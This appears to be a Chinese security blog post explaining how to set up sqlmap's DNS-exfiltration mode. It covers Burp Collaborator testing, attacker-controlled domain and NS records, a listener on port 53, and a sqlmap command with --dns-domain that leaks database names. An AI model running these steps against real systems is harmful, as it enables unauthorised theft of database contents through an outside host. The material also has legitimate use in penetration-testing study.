sqlmap _dns 注入配置方法

地球胖头鱼 2020-10-16
Web安全 发布于 2020-10-16 11:55:30 阅读 35 评论 0

sqlmap _dns注入配置方法

网上针对sqlmap进行dns注入的相关文章太少,只是简单介绍了下–dns-domain参数,相关的实战文章要么就写的模糊或者一笔带过,搞的云里雾里。然后自己参考网上的方法自己重新搞了一遍。

为什么突然想起来DNS注入呢,应为前几天碰到了一个时间盲注,我看到碰巧是台windows主机,然后我就想起来了DNS注入的方法。

在开始前我们先用sqlmap的--sql-shell命令进行dns的payload的测试。

先到burpsuite中的collaborator client中复制出burp给我们安排的域名

然后在利用sqlmap执行SQL语句

Sqlmap还在跑的过程中burpsuite中已经接收到请求了。

352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.

上面这看不懂的一大串里面只要知道352E362E3134出现就是执行version()后返回的结果,其他的看不懂也没什么问题。

解码获取到mysql的版本。好了至此这个点进行dns注入是没毛病的。

准备配置域名2个,网上有些文章说一个也行,但是总感觉较为麻烦,很多域名服务器商也并未提供某些高级功能,所以还是准备两个的简单些。
这里域名自己准备就行了,最好是在自己搭建的环境中自己写俩最好,这里就用www.a.comwww.b.com来代替了。

首先我们来配置域名a:

只需要添加*进行泛解析指向我们的外网服务器的ip就可以了。

在来配置我们的域名b:

这个就更简单了,直接修改域名的dns,就填入ns1.a.com ns2.a.com 就行了其他的都不用搞,照着填写就行了。

然后等待域名生效。我们在到外网服务器上来测试下看是否解析成功

服务器上开始监听53端口

然后本机ping hello.b.com 在外网服务器上发我们已经能接受到hello.b.com的请求,并且本机提示是找不到主机不用管,因为我们没有设置解析。已经都配置完毕我们使用sqlmap进行dns注入即可。

sqlmap -r post.txt --random-agent --batch --dns-domain=b.com --hex --dbs

在sqlmap中使用上述语句即可

来到这一步sqlmap会卡住提示设置DNS服务器实例

直接ctrl+c

提示通过DNS通道的数据检索成功。
这样我们DNS注入的配置就成功了,这样以后我们注入的速度和报错注入联合注入速度是一样快了,再也不用等待。

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章72
  • 作者收获粉丝1
  • 作者收到点赞0
  • 所有文章被收藏了0
  • 博客总访问量排行第6
  • 博客总访问量4376(每日更新)
查看所有博文